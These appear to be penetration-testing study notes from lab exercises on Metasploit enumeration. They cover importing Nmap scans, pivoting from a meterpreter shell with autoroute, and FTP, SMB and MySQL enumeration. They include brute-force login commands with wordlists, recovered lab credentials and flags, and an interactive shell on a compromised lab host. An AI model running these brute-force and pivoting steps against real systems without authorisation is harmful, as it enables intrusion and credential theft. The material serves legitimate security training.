Enumeration¶
What is Enumeration ?¶
First we do passive (Info gathering) and active (Host discovery and Port scanning). Than comes the next phase which is a logical phase which involves service enumeration.
In this case we will be directly interacting with the target system, mostly with the open ports so falls under Active Information Technique.
We are in the Enumeration phase.
Nmap Scripting Engine (NSE)¶
We will be using Metasploit with Nmap.
We can output Nmap documentation in file via using -oN/ -oX/ -oS/ -oG
The format will be like this:
nmap -Pn -sV -O <IP> -oX <file_name>
Importing Nmap Scan Results into MSF¶
First ping : ping -c 4 demo.ine.local
Step 2: Importing Nmap scan results into MSF
Perform the Nmap scan and save the output in XML format.
nmap -sV -Pn -oX myscan.xml demo.ine.local
After performing an Nmap scan and exporting a scan results XML format, you can import the results directly into the MSF.
Step 3: To begin with, you will need to start the postgresql database service. This can be done by running the following command: service postgresql start
Let's kick start MSF : msfconsole
To check if it's connected or not: db_status
Step 4: You can now import the Nmap scan results, in this case, we will be importing the scan results from the previous lab exercise db_import myscan.xml
Step 5: We can now view the results by running the following commands:
hosts
services
Conclusion
This lab demonstrates the process of importing Nmap scan results into the Metasploit Framework, enabling efficient integration of network discovery and vulnerability exploitation.
"Post scan using auxiliary modules" typically refers to post-exploitation scanning or enumeration done after an initial vulnerability scan or exploit, using auxiliary modules in a tool like Metasploit.
Let's break it down:
What are Auxiliary Modules?¶
In Metasploit, auxiliary modules are modules that are not used to exploit a vulnerability directly, but instead perform scanning, enumeration, information gathering, DoS, or post-exploitation tasks.
What is a Post Scan?¶
A post scan (short for post-exploitation scan) is typically run after gaining access to a system. It's used to gather further intel about:
- System internals
- Network configuration
- User accounts
- Password hashes
- Running services
- Other systems reachable from the compromised host
Putting It Together: "Post Scan using Auxiliary Modules"¶
This usually refers to running Metasploit auxiliary modules after initial access has been achieved, in order to:
- Enumerate network shares
- Dump credentials
- Check for privilege escalation paths
- Scan other internal machines (pivoting)
- Collect data like browser history, clipboard, or saved Wi-Fi passwords
show options > a handy one while inside msf
RHOSTS: demo1.ine.local
RPORT: 80
TARGETURI: /
LHOST:
LPORT: 4444
Now when you are inside the meterpreter : sysinfo
meterpreter > sysinfo Computer : demo1.ine.local OS : Linux demo1.ine.local 6.8.0-40-generic #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 5 10:34:03 UTC 2024 x86_64 Meterpreter : php/linux
Meterpreter : php/linux meterpreter > shell Process 805 created. Channel 1 created.
/bin/bash -i bash: cannot set terminal process group (433): Inappropriate ioctl for device bash: no job control in this shell www-data@demo1:/app/files$ ifconfig
It will give you the IP of next session (Victim 2)
Terminate the shell via pressing ctrl+C
We are now back to meterpreter: run autoroute -s 192.102.109.2
Now,
Check for sessions > search portscan > use 5 > set RHOSTS 192.102.109.3 > run
msf6 auxiliary(scanner/portscan/tcp) > run
[+] 192.102.109.3: - 192.102.109.3:22 - TCP OPEN [+] 192.102.109.3: - 192.102.109.3:21 - TCP OPEN [+] 192.102.109.3: - 192.102.109.3:80 - TCP OPEN [*] 192.102.109.3: - Scanned 1 of 1 hosts (100% complete)
Service Enumeration¶
1. Enumerated FTP Server Version¶
Module: auxiliary/scanner/ftp/ftp_version
Command
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.85.52.3
run
Purpose:
Retrieve FTP banner to identify the version and software type.
Result:
220 ProFTPD 1.3.5a Server (AttackDefense-FTP
Successfully identified the FTP server as ProFTPD 1.3.5a
2. Scanned for Valid Logins Using Bruteforce¶
Module: auxiliary/scanner/ftp/ftp_login
Command Sequence:
use auxiliary/scanner/ftp/ftp_login
set RHOSTS 192.85.52.3
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
ru
Purpose:
Attempt to brute-force valid FTP credentials using common usernames and passwords.
Result: Found valid logins:
sysadmin : 654321rooty : qwertydemo : butterflyauditor : chocolate
3. Checked for Anonymous Access¶
Module: auxiliary/scanner/ftp/anonymous
Command:
use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.85.52.3
run
Purpose:
Check if the FTP server allows anonymous login.
Result:
No anonymous access was allowed Module completed with no login success.
4. Manually Retrieved File After Successful Login¶
Command:
ftp 192.85.52.3
# Login with valid creds: sysadmin / 654321
ls
get secret.txt
Purpose:
Access FTP server manually to list files and retrieve secret.txt.
Result:
Successfully downloaded secret.txt (33 bytes)
FTP Enumeration is the process of gathering information from an FTP (File Transfer Protocol) server to identify potential entry points or weaknesses that can be exploited. This typically involves connecting to the FTP service to extract details such as server version (banner grabbing), checking for anonymous login access, and performing brute-force attacks to discover valid user credentials. Once access is gained, it may be possible to list directories, download files, or even upload malicious payloads. FTP enumeration is a vital phase in vulnerability assessments and penetration testing, especially when targeting legacy or misconfigured servers.
SMB ENUMERATION¶
SMB - Server Message Block - Example is Printer's connected in a network just like offices and cafes likewise how they transfer files to each other.
Every time we set the RHOST right insted of that make it global var :
setg RHOST <192.219.123.3>
Verify the Global Variable: getg RHOST
1. SMB Version Detection¶
- Module used:
auxiliary/scanner/smb/smb_version - Purpose: Identify the supported SMB protocol versions and detect the OS.
- Result:
- SMB v1, v2, and v3 are supported.
- Preferred dialect: SMB 3.1.1
- Host OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
2. User Enumeration (SAM)¶
- Module used:
auxiliary/scanner/smb/smb_enumusers - Purpose: List local users via the SAM RPC service.
- Result:
- Enumerated users:
john,elie,aisha,shawn,emma,admin - Domain:
SAMBA-RECON
- Enumerated users:
3. Share Enumeration¶
- Module used:
auxiliary/scanner/smb/smb_enumshares - Purpose: Enumerate SMB shares.
- Result:
- Found shares:
public,john,aisha,emma,everyone,IPC$ - Share type: all are disk shares except
IPC$(special IPC service)
- Found shares:
4. Brute-Force SMB Login¶
- Module used:
auxiliary/scanner/smb/smb_login - Purpose: Try multiple passwords against user
adminusing a Unix wordlist. - Result:
- Successful login with:
admin:password
- Successful login with:
5. Manual SMB Exploration Using smbclient¶
-
Accessed: Shares with valid credentials
-
\\\\192.219.123.3\\public- Navigated to
/secretfolder -
Retrieved a
flagfile containing:03ddb97933e716f5057a18632badb3b4
- Navigated to
-
\\\\192.219.123.3\\aisha- Navigated to
/dir - Retrieved another
flagfile containing:
- Navigated to
-
WEB SERVER ENUMERATION¶
My SQL Enumeration¶
System Info & Services¶
- Network Interfaces:
eth0: Internal IP10.1.0.6eth1: Connected to target subnet192.106.83.0/24with IP192.106.83.2
- PostgreSQL Service:
-
PostgreSQL 16 successfully started with:
service postgresql start
-
1. Metasploit Setup¶
- Launched
msfconsoleand created workspaceMySQL_ENUM. - Set global target:
RHOSTS = 192.106.83.3.
2. Scanned the Target¶
- Verified port 3306 is open via
auxiliary/scanner/portscan/tcp. -
Confirmed MySQL version:
5.5.61-0ubuntu0.14.04.1
3. Credential Discovery¶
- Used
mysql_loginmodule with a wordlist. -
Found valid login:
root:twinkle
4. Enumeration¶
- Extracted:
- User accounts
- Password hashes
- Privileged users (GRANT, SUPER, FILE, etc.)
- Identified weak configurations (e.g., root@% with password, some empty password users)
5. Database Discovery¶
- Queried:
select version();